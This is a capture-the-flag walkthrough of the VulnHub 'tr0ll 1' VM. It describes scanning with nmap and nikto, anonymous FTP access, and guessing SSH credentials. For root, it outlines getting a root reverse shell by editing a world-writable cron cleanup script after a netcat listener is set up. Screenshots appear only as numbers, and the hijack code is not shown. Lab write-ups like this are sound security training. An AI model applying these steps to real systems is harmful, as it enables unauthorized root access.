[Hacking series] – tr0ll 1

Written by  on May 29, 2015 

Code name: tr0ll

Webpage: http://overflowsecurity.com/?p=70

VM download: http://download.vulnhub.com/tr0ll/Tr0ll.rar

Challange: hack your way into the system and get root

First of all and just after booting our victim’s box, we start by searching tr0ll on the network.

# netdiscover

1

As our victim VM is running under VirtualBox, we can find its ip easily, we just have to look at the MAC Vendor, it will be CADMUS COMPUTER SYSTEMS.

Now we got our victim’s IP we will use nmap to scan for open ports and interesting information

# nmap -Pn -A -p- 192.168.11.8

2

Nice, ports 21, 22 and 80 open. And according to the output of nmap, there’s an ftp server running on port 21 with anonymous login enabled!

# ftp 192.168.11.8

3

We successfully logged into the ftp server, and after checking our permissions, the only thing we can do here is downloading the lol.pcap file

# get lol.pcap

lol.pcap looks like a wireshark capture file. Let’s use wireshark see what’s inside

5

The capture file seems to be a “conversation” between an ftp client and an ftp server. But if we look it closely we can see an interesting file out there, secret_stuff.txt. As we just saw that file doesn’t seem to be inside the ftp server right now. We can use wireshark to read it’s content

6

“we almost found the sup3rs3cr3tdirlol”

Well, let’s keep that and go scan our next service. Next step will be looking inside the web server. We start by just browsing it

7

Nothing more than the expected, no sensitive information found. We will use nikto to look for hidden directories

# nikto -h http://192.168.11.8

8

After running the scan we found the “/secret/” dir. And if we browse it..

9

Nothing new… just more trolling. N0w’s when the thinkin’ begins. After few minutes I reminded the sup3rs3cr3tdirlol… and when I looked at that dir in the browser

10

Nice, that’s actually a directory on the web server. That directory contains a file, we will download it.

11

After a few tries, we realized that the file is an executable. If we run that executable we can get a memory address. Following the same logic we used with the sup3rs3cr3tdirlol, let’s put it in the browser one more time.

12

Nice, now let’s look inside that directories

13

The first seems to contain a list of users and the second a password. We can try to perform a dictionary based attack against ftp and ssh services on our target marchine.

After few minutes banging my head against the wall, I realized¬† that the ssh username was “overflow” and its password was “Pass.txt”(trolled again). So we can log into the system with these credentials.

14

Nice, we are in. Now we can look for suid files or weaknesses in kernel

16

But after about 2 minutes inside…

15

Uh.. something or someone killed our connection. What could it be? After a quick analysis we can see that it happens every 2 minutes. Every 2 minutes? Can it be a cron task?? Let’s see

17

We can’t actually see or edit crontab but we can read /var/log/cronlog and that will give some interesting info

18

Nice, cron is running a python script called cleaner every 2 minutes. We can use the find command to search for that file

# find / -name ‘cleaner.py’ 2>/dev/null

19

Now let’s read the file

20

What that file does is delete all the content in /tmp everytime it’s called.

21

But that’s executed by the user root! Thinking the same? That could be a great way of doing our privilege escalation!

For the next trick we will need to start our netcat listener on port 9988

22

Then and after editing our “perl-reverse-shell.pl” we will download it in the /tmp dir on the target machine

23

And finally, we will edit cleaner.py like this:

24

Now every 2 minutes, our victim will send a root shell to 9988 on our box B-). We can go to the fridge, grab a beer and wait for a shell

25

Game over tr0ll P-)

Category : hacking series

Leave a Reply

Your email address will not be published. Required fields are marked *